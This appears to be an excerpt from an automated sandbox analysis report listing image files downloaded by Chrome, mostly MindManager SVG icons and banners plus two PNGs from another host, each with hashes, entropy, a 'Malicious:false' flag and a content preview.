                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#9a9aa3;}.cls-2{fill:#727272;}.cls-3{fill:#fff;}</style></defs><title>priority08</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M4.94,10.06A2.4,2.4,0,0,1,5.22,9a3.38,3.38,0,0,1,.55-.84,5,5,0,0,1,.55-.49,2.48,2.48,0,0,1-.91-1.91,2.76,2.76,0,0,1,.86-2,3.4,3.4,0,0,1,2.5-.84,3.72,3.72,0,0,1,2.42.78,2.56,2.56,0,0,1,1,2.12,3.7,3.7,0,0,1-1,2.3,2.47,2.47,0,0,1,1.18,2.1,2.85,2.85,0,0,1-1,2.15,3.91,3.91,0,0,1-2.73.9,3.87,3.87,0,0,1-2.73-.92A2.87,2.87,0,0,1,4.94,10.06Zm2.5-.21a1.13,1.13,0,0,0,.35.83,1.2,1.2,0,0,0,.86.33,1.4,1.4,0,0,0,.88-.26A1,1,0,0,0,9.85,10a.48.48,0,0,0,0-.18.5.5,0,0,0-.1-.17,1,1,0,0,0-.13-.15.92.92,0,0,0-.2-.16l-.22-.14L8.9,9.05l-.28-.14-.31-.14L8,8.62A1.73,1.73,0,0,0,7.44,9.85Zm2-2.72A2.32,
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):1203
                                                                Entropy (8bit):5.042758427957266
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D92C14144AA03117557ED45E2CD40E02
                                                                SHA1:847070294B39B287D2FFA3758760A73AF5A2228C
                                                                SHA-256:A2F46FC5441326CA9A398001FA7DFBB161861E50B761E1A7FA062775522B3CDE
                                                                SHA-512:DB937FD54EA58B6FB5F26F35ACE5684C3E815161539A7CA44DE29E31F94977FEF6043641A83146F55F0DB1EB0319847F8F4FD36398F2C67B18039FF9AE5B76F8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18.73 17.19"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#d37118;}.cls-3{fill:none;stroke:#d37118;stroke-miterlimit:10;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><circle class="cls-1" cx="11.5" cy="3.5" r="3"/><path class="cls-2" d="M11.5,1A2.5,2.5,0,1,1,9,3.5,2.5,2.5,0,0,1,11.5,1m0-1A3.5,3.5,0,1,0,15,3.5,3.5,3.5,0,0,0,11.5,0Z"/><path class="cls-2" d="M10,15H5.29c.24-5.56,3-8,6.71-8,1.34,0,1.27-1-.81-1C6.61,6,4,9.05,4,15.7V16h6Z"/><circle class="cls-1" cx="3.5" cy="3.5" r="2"/><path class="cls-2" d="M3.5,2A1.5,1.5,0,1,1,2,3.5,1.5,1.5,0,0,1,3.5,2m0-1A2.5,2.5,0,1,0,6,3.5,2.5,2.5,0,0,0,3.5,1Z"/><path class="cls-2" d="M1.38,9c0-2.34.83-3.5,2.45-3.5a2.5,2.5,0,0,1,2,1.16L6.29,5.5A2.84,2.84,0,0,0,3.83,4.26C.16,4.26.16,8,0,8v2H2V9Z"/><path class="cls-3" d="M18.23,15.51c0-2.06-2.73-3.06-2.73-3.06h0s-2.73,1-2.73,3.06v1.12h5.46Z"/><polygon class="cls-2" points="16.51 16.07 15.51 14.82 14.63 15.97 16
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):954
                                                                Entropy (8bit):5.105178943396653
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2E174AFAE30CF1ECC8ECD0B324A1A9DF
                                                                SHA1:C3371070D9911006B92A690F91475C42F7981439
                                                                SHA-256:B6C4B204934076F4A1494368883A9E91F8C4DBA88A98DB80C675447710CACA36
                                                                SHA-512:BC36181AAD2536592E4BA9B2C6E9D01AFA6A49696B3F173E4ACBB9C400B83C141F0483CA818A3CBC01BF9CA8EC6DAAE5305A847BBB89BC67B004DED8A4BF7E92
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/refresh.svg
                                                                Preview:<?xml version="1.0" ?><svg enable-background="new 0 0 512 512" height="512px" id="Layer_1" version="1.1" viewBox="0 0 512 512" width="512px" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><g><path d=" M320,222l42,13c-9.8-49.6-53.5-87-106-87s-96.2,37.4-106,87" fill="none" stroke="#3a52a0" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" stroke-width="16"/><line fill="none" stroke="#3a52a0" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" stroke-width="16" x1="381" x2="362" y1="191.5" y2="235"/><path d=" M192,290l-42-13c9.8,49.6,53.5,87,106,87s96.2-37.4,106-87" fill="none" stroke="#3a52a0" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" stroke-width="16"/><line fill="none" stroke="#3a52a0" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" stroke-width="16" x1="131" x2="150" y1="320.5" y2="277"/></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):240
                                                                Entropy (8bit):5.0418907103824555
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EE2459F9D07D1603E7027022DD5EF323
                                                                SHA1:4D55732A5887C8BAFFAFEE9EE718C57C36A16816
                                                                SHA-256:6FD1ACE8099D023034352DE4405B8959A7D0EBD93E08EBEDCCBB0B768810285D
                                                                SHA-512:2D71885DCBA8A2248C04AF46147190D4497D0BDD1B94A50DADA8BA66707F8A42F44BA2A04DB45AB535152737AD6F6BDEB083A7E143141E96C3BC6876C803DE38
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/marker-2.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03b37;}</style></defs><title>heart_red_16 copy</title><polygon class="cls-1" points="0 0 8 0 16 8 8 16 0 16 0 0"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):512
                                                                Entropy (8bit):5.334656357061619
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:801AA43F454F9AEA42FBB8F59031C5D5
                                                                SHA1:D3CFE820C5D571F57C095D863B0567A41B64316C
                                                                SHA-256:44ADAB87B73F4DB70A6C464C4230B5A370856B60B64031BBFFF680F0D5F49F21
                                                                SHA-512:5090C3AC746E26C1896419B2A9368139A41CF6349035A0DF389A90DD103D828C4BE7E7A709A1B9F4096AE82B4FF89216F27251AD7F96D547937786FE61ACB1B2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/question-mark.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#1c97e6;}.cls-2{fill:#91c6e5;}.cls-3{font-size:14px;fill:#fff;font-family:MuseoSans-900, Museo Sans;}</style></defs><title>feedback_q_16</title><rect class="cls-1" x="1" y="1" width="14" height="14" rx="1" ry="1"/><path class="cls-2" d="M14,2V14H2V2H14m0-2H2A2,2,0,0,0,0,2V14a2,2,0,0,0,2,2H14a2,2,0,0,0,2-2V2a2,2,0,0,0-2-2Z"/><text class="cls-3" transform="translate(4.33 12.68)">?</text></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):32213
                                                                Entropy (8bit):4.245638858708523
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D591DDDE35905A338D9B26C9C6C7CB1E
                                                                SHA1:8D94E28B36F08FF2374FC66DA7DD7E2E38B8138D
                                                                SHA-256:151421B75012C1C35C1601777852A196183660C7F8525BA3C4A6C9B6C6F61D84
                                                                SHA-512:8EDB6AC17FE9C481E81E2DCBA4CE0F49DD9F2EAC3DB3C1B07E9471D6311E1E53B44FAC109535E0D3ED6B8AFC67DCCAE501136315F492E16543743730599F5728
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_strategy_analysis.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_8353)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#CADEF7"/>..<g clip-path="url(#clip1_456_8353)">..<path d="M531.795 11.0114C546.179 10.7262 560.683 7.45019 574.825 10.0943C600.666 14.9258 620.297 41.8294 617.013 67.9125C613.729 93.9955 588.042 115.194 561.81 113.469C553.336 112.912 544.643 110.316 536.538 112.849C525.736 116.223 519.107 127.781 508.371 131.36C493.831 136.207 475.346 124.041 464.154 115.718C452.609 107.132 439.218 94.3189 433.88 80.587C428.372 66.4198 429.359 47.6501 433.484 33.27C437.181 20.381 446.477 9.51911 458.878 4.29334C473.994 -2.07687 486.331 2.69423 501.063 6.94879C511.045 9.8373 521.405 11.2068 531.795 11.0114Z" fill="#AFCBEE"/>..<path d="M605.24 90.5977H501.755C498.82
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):484
                                                                Entropy (8bit):5.021568261571659
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BF438765AB92175369F557246A11AE60
                                                                SHA1:9705DC4AB1E68B862BEC9EABC0E0C10061B2D60F
                                                                SHA-256:65D2440B5A674954C38A54C5E88C95420AA6958759698489126A7B5BE6FC3242
                                                                SHA-512:83AF0644D67F025A895DD78B8396F3C08B9D61452833B6EBB48A72DB689A0D505B5D542150A9572583D45E8ABFB1D122CB12C4E51FAF49916472EE4E8119C8B2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/flag-red.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03b37;}.cls-2{opacity:0.2;}</style></defs><title>flag_red_16 copy</title><rect class="cls-1" x="1" width="1" height="16" rx="0.5" ry="0.5"/><polygon class="cls-1" points="8 11 8 4.5 16 7.75 8 11"/><polygon class="cls-1" points="8 8.5 2 10 2 1 8 2.5 8 8.5"/><rect class="cls-2" x="7" y="3" width="1" height="6"/><rect width="1" height="16" rx="0.5" ry="0.5"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3488
                                                                Entropy (8bit):4.337038531521404
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BC0C5FA3FE7FB49D3ECBA3CBD26FE994
                                                                SHA1:1362108063574B5CE264DD114B41CDA80E5C56CA
                                                                SHA-256:FF76CF70E3312E3057B4AF04F87D8B49D01F561D590F283C747192BDB52A671B
                                                                SHA-512:4D5224FB92889CAFEDF797FB2B92C758567AEF0FCDB3D9B589EE75C52827D83B936A2F2CFE9F27A4F0FC5F8B69252FED7B0EB097A454A2E65E6E4345480220CB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/publish-menu/svg/logo.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 121.12 18">. <title>2018 Publish - mm logo</title>. <g id="Layer_2" data-name="Layer 2">. <g id="Layer_1-2" data-name="Layer 1" fill="#ffffff">. <path d="M13,14.56H11.63l.1-12.35L7,14.56H6L1.18,2.21l.16,12.35H0V0H1.63L6.56,12.35,11.26,0H13Z"/>. <path d="M16,2.41h-1.2V.54H16Zm0,12.14h-1.2V4.72H16Z"/>. <path d="M25.33,14.56H24.12V9.46c0-1.92,0-2.47-.37-3a2.24,2.24,0,0,0-1.92-.85,2.63,2.63,0,0,0-2.29,1.11c-.62.82-.62,1.46-.62,3.53v4.31H17.71V4.74h1.22V6.49a3,3,0,0,1,3.07-2,3.26,3.26,0,0,1,2.68,1.18c.64.85.66,1.65.66,3.77Z"/>. <path d="M34.93,14.56h-1.2V12.78a3.08,3.08,0,0,1-3,2c-2.31,0-4.06-2-4.06-5.15s1.9-5.11,4.25-5.11a2.83,2.83,0,0,1,2.82,1.79V0h1.2ZM33.14,6.68A2.66,2.66,0,0,0,31,5.63c-1.94,0-3,1.73-3,4,0,1.48.45,4,2.93,4,2.82,0,2.85-3,2.87-3.9A5.18,5.18,0,0,0,33.14,6.68Z"/>. <path d="M50.26,0V14.56H47.6l.25-12-3.13,12H42.26l-3.15-12,.27,12H36.72V0h4l2.85,10.8L46.3,0Z"/>. <path d="M52,7.28a3.35,3.35
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):463
                                                                Entropy (8bit):5.225394352335245
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AE5541473D16147134A1ACD964FAC748
                                                                SHA1:1D4C5B3829AEC02781F86253EDBC03B61DEDD8DB
                                                                SHA-256:C4EAA415F84F76486920441B05F4FE2E5E36E0E8DCB9B7E0C7CC60BDF93EF6A4
                                                                SHA-512:634047097D84FE79E77A99895B245B42FCECC6FE905C7AD14862CB8A78292A36D24E298491651330335539B755693187D3461C568211F7BB8AB2FBCAA5C01CDC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/design/layout-tree.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 6 11"><defs><style>.cls-1{fill:none;stroke:#3271ae;}.cls-1,.cls-2{stroke-miterlimit:10;}.cls-2{fill:#efeeee;stroke:#4a4a4a;}</style></defs><title>layout-tree</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><line class="cls-1" x1="3" y1="7.5" x2="6" y2="7.5"/><path class="cls-1" d="M6,10.5H4A1.48,1.48,0,0,1,2.5,9V6"/><circle class="cls-2" cx="3" cy="3" r="2.5"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):70712
                                                                Entropy (8bit):6.94130504124589
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F70FF06D19498D80B130EC78176FD3FF
                                                                SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                                SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                                SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/stArUIHg0PAKqTv5wvVdfK1HFFAtY3r3SWXHzf2CPgmnT2BgcWHJ0QZkXeZcjjtgXEimLvNfaNREXdgh251
                                                                Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):517
                                                                Entropy (8bit):5.031948632215112
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D55852337166CB9893BEAABFCD1C5CCF
                                                                SHA1:08F70645904562F40E2781BEB4753D054F098B11
                                                                SHA-256:9361AEA06FC162D9F69FA48E37398C6A6512E153F57687B47C7036D614C3164E
                                                                SHA-512:3B2C7581E730F6FF4C10B969AE1B6976763FC9291D21EFEE1BF366FD817BEC021B40EF5F2507DEA323625786F8EA47885767BC96F0F6669B6813963E76F864E8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/design/layout-timeline.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 14 6"><defs><style>.cls-1{fill:none;stroke:#3271ae;}.cls-1,.cls-2{stroke-miterlimit:10;}.cls-2{fill:#efeeee;stroke:#4a4a4a;}</style></defs><title>layout-timeline</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><line class="cls-1" x1="6" y1="3.5" x2="14" y2="3.5"/><circle class="cls-2" cx="3" cy="3" r="2.5"/><line class="cls-1" x1="8.5" y1="2" x2="8.5" y2="5"/><line class="cls-1" x1="11.5" y1="2" x2="11.5" y2="5"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):727
                                                                Entropy (8bit):7.573165690842521
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                                SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                                SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                                SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/opCYa0IqQPuFG3DGmV3xZsyNzXefJ7S8a4To9qjdC9FgVw7Bgs67134
                                                                Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):491
                                                                Entropy (8bit):7.273153506216662
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9DEBDE87AAF325D04A5C123076FE4847
                                                                SHA1:3BD363F84E69C584AE8CDFEF31F00E7D145F90CB
                                                                SHA-256:974D67AB778444E8934B189E81AA58A0BE8240AE7BCC6D52A9B51CD35AB1E30C
                                                                SHA-512:5FB94A875FCD82A6D7AE1366086CF08908AFF03206626C96E43FD848DC12109DD5F44F23CDC48A4435EEB28A87F894E500A8DDEB84F5B17B21DD44C33650056C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-align-center.png
                                                                Preview:.PNG........IHDR...0...0.....W.......pHYs.................tEXtSoftware.Adobe ImageReadyq.e<...xIDATx..Y1..@.\H.......d..'\G.Sh.x.....A.\E....:%...H.Kli..Z%3.{2.A.u..4MO.%.q-.....c..x...u0.....".....lE...;.;...f..K........-!.S!...8..Bwj..[.b.gP.j..n......:.=..!8..]'...G.:...oX....Y.I.o.S5Z.p..P..$(C.....M.........j .j .|..$/D=p&..3s.fN.(.% ....3....#Ym.w...]<...}.i.|.z.=.u]_BO...C....Z$P....<b.Cj.P}~<..X......9.f!..6...nT.(.-.9.tN<?tN,.?.o.BNH.5.....9.M...Gg....@+....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):243
                                                                Entropy (8bit):5.038642056882634
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AEFADF2EF120366F04E81EAEDE05615C
                                                                SHA1:082EDB45F6A4D4C8B5CC9BEDD1FAD1326FE43B7D
                                                                SHA-256:4CD14E8CE162D577190406F2549F529DF671F18F214BDFC59D714F8CEFC96130
                                                                SHA-512:F27EB5C728BA8660EF9FC36E3F6E830447AB55BABA1FAE84A5F8240C4F6BB6856F90B6CC2D11338372F35613391F69542BBC75467281FB2CE3A48D82094AE55C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/marker-6.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#8f92f7;}</style></defs><title>heart_violet_16 copy</title><polygon class="cls-1" points="0 0 8 0 16 8 8 16 0 16 0 0"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):30217
                                                                Entropy (8bit):4.05083209723931
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:494AE806894E7811218D8E9BA6B362D0
                                                                SHA1:54F5E0B80D46C7EA710DA8171022ABDD36D11800
                                                                SHA-256:F314710673104B02B9A96A227106FAA0087A3ABF30C8B0FCFFA176DE909E7748
                                                                SHA-512:6C6E0D09E661B5A5F7E6F1E1C4297E6181E0B834D63ED2170E8A4008228A1760033B01D23C8864550FB99908C2B65D9438A25640B9CCDE0012D9D16CBFEDD971
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_brainstorming_ideation.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_9597)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#FFF3DC"/>..<path opacity="0.5" fill-rule="evenodd" clip-rule="evenodd" d="M605.804 226.703C599.013 249.813 587.51 272.888 565.277 282.155C543.384 291.28 519.178 283.046 498.501 271.426C478.627 260.257 520.128 229.398 479.412 229.398C428.058 216.33 424.025 141.355 457.595 121.599C490.59 102.181 515.406 144.03 539.838 144.996C564.165 145.958 581.418 135.381 602.524 155.398C628.452 179.988 592.11 215.142 605.804 226.703Z" fill="#F8D79B"/>..<path d="M556.848 116.865C560.009 116.865 562.572 114.907 562.572 112.491C562.572 110.075 560.009 108.117 556.848 108.117C553.687 108.117 551.124 110.075 551.124 112.491C551.124 114.907 553.687 116.865 556.848 116.8
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):546
                                                                Entropy (8bit):5.228697020541525
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:431049D50E92F74D69CCC9FC59D8448D
                                                                SHA1:B4F323787EFF24CB012F4A9C239591E44C344B24
                                                                SHA-256:5BCC4E700A26FA772EE2CAF5E0D3B1FB3177BD88818C78607104B2F95FE8C59E
                                                                SHA-512:DFC9D30A3FF09F090C9D6061A2EF32B50BAD21CBABA6F3DC4034827926517CDD01D196ADFDF41228900CDCC78C6FB0EA2F6D4420A908EE507947BF6B115BCC09
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/percentageDone02.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}</style></defs><title>percentageDone02</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M8.5.52a7.5,7.5,0,0,1,4.68,2.07L8.5,7.27Z"/><path class="cls-4" d="M9,1.07a6.89,6.89,0,0,1,3.46,1.54L9,6.06v-5M8,0V8h.48l5.41-5.41A8,8,0,0,0,8,0Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3629
                                                                Entropy (8bit):4.947451563862825
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:03FAFAE15B51047CC04646E816286927
                                                                SHA1:232C7366A06D70C2BB34AC22E747927A6999BBC4
                                                                SHA-256:EADDF318AC17C46B4D3022AD70BB63B70FDBA45A75B4C7886170DFD9BB3AFEDA
                                                                SHA-512:E3C789920F9A1551566530B040CDD975FA1666FB1F1E5A10E9C80553A09EE9C988BE6BD36F35CF54546E577EFA0E328EF992D76E363911ED5CE198A62A40F40E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/fiveforcesanalysis.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="42" y="6" width="39.5245" height="22.7266" rx="2" fill="#B0E0FF"/>.<rect x="42" y="66.2734" width="39.5245" height="22.7266" rx="2" fill="#D4E4C1"/>.<rect x="61.7617" y="36.6309" width="46.4413" height="22.7266" rx="2" fill="#385061"/>.<rect x="88.4414" y="6" width="39.5245" height="22.7266" rx="2" fill="#C9F5F4"/>.<rect x="88.4414" y="66.2734" width="39.5245" height="22.7266" rx="2" fill="#FBEBD5"/>.<g opacity="0.4">.<rect x="95.3594" y="14.8965" width="10.8692" height="3.95245" fill="#5CBFC9"/>.<rect x="111.169" y="8.9668" width="9.88113" height="3.95245" fill="#5CBFC9"/>.<rect x="111.169" y="14.8965" width="9.88113" height="3.95245" fill="#5CBFC9"/>.<rect x="111.169" y="20.8242" width="9.88113" height="3.95245" fill="#5CBFC9"/>.</g>.<g opacity="0.45">.<rect x="95.3594" y="76.1562" width="10.8692" height="3.95245" fill="#F9C75D"/>.<rect x="111.169" y="70.2266" width="9.88113" he
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):1864
                                                                Entropy (8bit):5.222032823730197
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                Malicious:false
                                                                Reputation:unknown
